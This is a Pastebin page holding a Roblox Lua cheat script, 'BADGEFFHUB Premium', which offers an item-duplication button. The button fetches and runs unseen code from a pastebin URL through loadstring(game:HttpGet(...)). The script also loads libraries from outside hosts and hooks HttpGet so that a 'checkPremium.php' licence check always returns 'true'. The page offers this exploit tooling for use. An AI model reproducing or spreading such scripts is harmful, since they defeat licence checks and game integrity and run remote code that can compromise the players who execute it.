Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
- local Window = OrionLib:MakeWindow({Name = "BADGEFFHUB Premium", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})
- local Tab = Window:MakeTab({
- Name = "Dupe",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- OrionLib:MakeNotification({
- Name = "Wait!",
- Content = "Wait 5 seconds after pressing dupe button!",
- Image = "rbxassetid://4483345998",
- Time = 10
- })
- Tab:AddButton({
- Name = "DUPE!",
- Callback = function()loadstring(game:HttpGet("https://pastebin.com/raw/FL8LEszx"))()
- print("button pressed")
- end
- })
- local httpHook;
- httpHook = hookfunction(game.HttpGet, function(self,...)
- local Args = {...}
- if Args[1] and type(Args[1]) == "string" then
- if Args[1]:match("checkPremium.php") then
- return "true"
- end
- end
- return httpHook(self,...)
- end)
- local OrionLib = loadstring(game:HttpGet(('https://hypernite.xyz/Backup/Orion/source.lua')))()
Advertisement
Add Comment
Please, Sign In to add comment